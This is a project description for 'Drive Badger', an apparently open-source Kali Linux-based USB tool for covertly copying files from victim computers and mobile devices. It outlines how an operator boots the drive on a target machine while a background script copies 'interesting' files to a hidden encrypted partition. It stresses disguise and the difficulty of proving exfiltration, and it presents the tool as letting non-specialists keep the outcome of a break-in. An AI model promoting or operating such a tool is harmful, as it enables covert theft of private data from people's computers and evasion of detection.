Drive Badger: open source platform for covert data exfiltration operations, ranging from small computers to big servers.

Drive Badger and Mobile Badger

Drive Badger is split into 2 separate products:

  • Drive Badger itself, based on Kali Linux, meant for data exfiltration from "normal" computers (non-mobile)
  • Mobile Badger, based on Debian/Ubuntu/Rasbian, meant for data exfiltration from mobile devices (phones, tablets, photo cameras etc.)

Drive Badger and Mobile Badger however share:

  • most source code parts (and the same repository)
  • the same exclusion rules
  • the same drive encryption keys
  • the same hooks

Design and usage safety

Drive Badger is built on top of Kali Linux. Thus is leverages mechanisms like:

  • udevd and systemd for actual hard drive identification
  • Kali persistent partitions feature, to encrypt the target partition using LUKS
  • Kali Linux as such, to disguise itself (you can run anything on screen, while the attack is running in the background)

There is no way to distinguish between Drive Badger and ordinary Kali Linux, or to prove the fact of data exfiltration, until:

  • someone knows the proper LUKS password
  • it is caught in the act (including after the attack has finished, but Kali Linux is still working)
  • you use the non-encrypted persistent partition (it is required for some old platforms)

Mobile Badger is built on top of Debian Linux with systemd version 229 or newer, or its clone, eg. Ubuntu, Raspbian or any other. More details are provided in its dedicated Wiki.

How it works

  • operator connects Drive Badger USB drive to victim computer

  • operator boots Live USB Encrypted Persistence

  • Kali Linux starts in text mode (at this point operator can run startx to enter graphics mode)

  • /etc/rc.drivebadger script is run in background

  • it enumerates all local hard drives, including RAID devices, Bitlocked-encrypted drives etc., and makes a copy of "interesting" files (based on configuration rules) to special, hidden subdirectory on persistent partition

From the founder...

Being in IT security business for almost 25 years, I realized, that breaking protections (or preventing it) is becoming less and less important. We are not living in Outlook Express times anymore...
The key point is the ability to keep the privileges permanent, once obtained. This becomes more and more difficult, as IT systems get more and more complicated - and this is exactly the goal of Drive Badger project: to give non-ITSEC people the ability to keep either the privileges, or the outcome of the successful break-in.